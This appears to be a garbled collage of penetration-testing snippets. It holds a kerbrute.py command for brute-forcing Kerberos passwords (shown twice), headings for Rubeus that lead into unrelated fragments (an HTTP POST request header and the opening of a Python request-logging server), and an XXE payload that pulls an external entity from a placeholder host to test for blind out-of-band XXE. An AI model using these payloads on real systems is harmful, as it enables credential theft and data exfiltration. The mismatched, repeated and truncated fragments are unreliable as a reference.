With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
POST /api/Action/TestAction HTTP/1.1 | |
Host: <target> | |
Content-Length: 3978 | |
Accept: application/json, text/javascript, */*; q=0.01 | |
X-XSRF-TOKEN: <token> | |
X-Requested-With: XMLHttpRequest | |
ViewLimitationID: 0 | |
User-Agent: Mozilla/5.0 | |
Content-Type: application/json; charset=UTF-8 | |
Cookie: <cookie> |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/env python3 | |
""" | |
License: MIT License | |
Copyright (c) 2023 Miel Donkers | |
Very simple HTTP server in python for logging requests | |
Usage:: | |
./server.py [<port>] | |
""" | |
from http.server import BaseHTTPRequestHandler, HTTPServer |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |